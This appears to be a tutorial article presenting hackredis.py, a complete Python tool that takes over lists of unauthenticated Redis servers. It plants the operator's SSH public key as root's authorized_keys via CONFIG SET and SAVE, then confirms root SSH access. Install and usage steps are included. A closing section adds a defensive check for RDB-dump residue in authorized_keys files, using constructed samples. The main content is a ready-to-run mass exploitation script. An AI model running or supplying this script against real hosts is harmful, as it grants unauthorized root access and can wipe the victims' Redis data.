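Python Script for Batch Privilege Escalation via Unauthorized Redis Access
Preface
This article covers batch privilege escalation through unauthorized Redis access, shared here for reference and study. Without further ado, here are the details.
Install dependencies
```
sudo easy_install redis
```
Usage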
```
python hackredis.py
usage: hackredis.py [-h] [-l IPLIST] [-p PORT] [-r ID_RSAFILE] [-sp SSH_PORT]

For Example:
-----------------------------------------------------------------------------
python hackredis.py -l ip.txt -p 6379 -r foo.txt -sp 22

optional arguments:
  -h, --help     show this help message and exit
  -l IPLIST      the hosts of target
  -p PORT        the redis default port
  -r ID_RSAFILE  the ssh id_rsa file you generate
  -sp SSH_PORT   the ssh port
```
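First, an SSH key pair is needed:
```
ssh-keygen -t rsa
cp ~/.ssh/id_rsa.pub /tmp/foo.txt
```
Then put the list of IPs into ip.txt and run the script. Hosts where it succeeds are written to success.txt, hosts where the write succeeded but the SSH connection failed are stored in unconnect.txt, and hosts where the operation failed are stored in fail.txt.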
```python
#!/usr/bin/python
#coding:utf-8
#############################################################
## @file hackredis.py                                      ##
## @date 2015-12-11                                        ##
## @author evi1cg                                          ##
#############################################################
import redis
import argparse
import textwrap
import sys
import pexpect

def getargs():
    parser = argparse.ArgumentParser(prog='hackredis.py', formatter_class=argparse.RawTextHelpFormatter, description=textwrap.dedent('''\
    For Example:
    -----------------------------------------------------------------------------
    python hackredis.py -l ip.txt -p 6379 -r foo.txt -sp 22'''))
    parser.add_argument('-l', dest='iplist', type=str, help='the hosts of target')
    parser.add_argument('-p', dest='port', default=6379, type=int, help='the redis default port')
    parser.add_argument('-r', dest='id_rsafile', type=str, help='the ssh id_rsa file you generate')
    parser.add_argument('-sp', dest='ssh_port', type=int, default=22, help='the ssh port')
    if(len(sys.argv[1:]) / 2 != 4):
        sys.argv.append('-h')
    return parser.parse_args()

def hackredis(host, port):
    ck = 0
    try:
        print "[*] Attacking ip:%s" % host
        r = redis.StrictRedis(host=host, port=port, db=0, socket_timeout=2)
        r.flushall
        r.set('crackit', foo)
        r.config_set('dir', '/root/.ssh/')
        r.config_set('dbfilename', 'authorized_keys')
        r.save()
        ck = 1
    except:
        print "\033[1;31;40m[-]\033[0m Something wrong with %s" % host
        write(host, 2)
        ck = 0
    if ck == 1:
        check(host)
    else:
        pass

def check(host):
    print '\033[1;33;40m[*]\033[0m Check connecting...'
    try:
        ssh = pexpect.spawn('ssh root@%s -p %d' % (host, ssh_port))
        i = ssh.expect('[#\$]', timeout=2)
        if i == 0:
            print "\033[1;34;40m[+]\033[0m Success !"
            write(host, 1)
        else:
            pass
    except:
        print "\033[1;32;40m[-]\033[0m Failed to connect !"
        write(host, 3)

def write(host, suc):
    if suc == 1:
        filesname = 'success.txt'
    elif suc == 2:
        filesname = 'fail.txt'
    elif suc == 3:
        filesname = 'unconnect.txt'
    else:
        pass
    file_object = open(filesname, 'a')
    file_object.write(host + '\n')
    file_object.close()

def main():
    global foo, ssh_port
    paramsargs = getargs()
    try:
        hosts = open(paramsargs.iplist, "r")
    except(IOError):
        print "Error: Check your host file path\n"
        sys.exit(1)
    port = paramsargs.port
    ssh_port = paramsargs.ssh_port
    try:
        foo = '\n\n\n' + open(paramsargs.id_rsafile, "r").readline() + '\n\n\n'
    except(IOError):
        print "Error: Check your wordlist path\n"
        sys.exit(1)
    ips = [p.replace('\n', '') for p in hosts]
    for ip in ips:
        hackredis(ip.strip(), port)

if __name__ == "__main__":
    main()
```
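Because the script points the Redis dump file at /root/.ssh/authorized_keys, an affected host is left with an authorized_keys file that is really an RDB dump with a newline-padded key inside it. The check below is an added example for defenders, not part of the original article or of hackredis.py; the function name and both sample byte strings are constructed for illustration.

```python
import re

# RDB dump files start with the ASCII magic "REDIS" plus a 4-digit version.
RDB_MAGIC = re.compile(rb"REDIS\d{4}")
# Plain "type base64 [comment]" entries; entries with an options prefix are not parsed.
KEY_LINE = re.compile(
    rb"(ssh-(?:rsa|dss|ed25519)|ecdsa-sha2-\S+) ([A-Za-z0-9+/=]+)(?: (.*))?$")


def inspect_authorized_keys(data):
    """Inspect the raw bytes of one authorized_keys file for RDB-dump residue."""
    report = {"rdb_magic": bool(RDB_MAGIC.match(data)), "binary_lines": 0, "keys": []}
    for raw in data.split(b"\n"):
        line = raw.strip()
        if not line or line.startswith(b"#"):
            continue
        m = KEY_LINE.match(line)
        if m:
            comment = (m.group(3) or b"").decode("utf-8", "replace")
            report["keys"].append((m.group(1).decode(), comment))
        elif any(c > 0x7E or (c < 0x20 and c != 0x09) for c in line):
            report["binary_lines"] += 1  # sshd skips these; a normal file has none
    report["suspicious"] = report["rdb_magic"] or report["binary_lines"] > 0
    return report


# Constructed sample: RDB-style header and trailer around a newline-padded key,
# the layout left behind when a dump is saved as authorized_keys.
TAMPERED = (b"REDIS0006\xfe\x00\x00\x07crackit@\x9f\n\n\n"
            b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7 user@constructed\n\n\n\n"
            b"\xff\x8a\x13\xe2\x01")
# Constructed sample: an ordinary file with one comment line and one key.
CLEAN = b"# ops\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructed admin@example\n"

if __name__ == "__main__":
    for name, blob in (("tampered", TAMPERED), ("clean", CLEAN)):
        print(name, inspect_authorized_keys(blob))
```

Any key listed in a report flagged as suspicious should be treated as untrusted until its owner is confirmed.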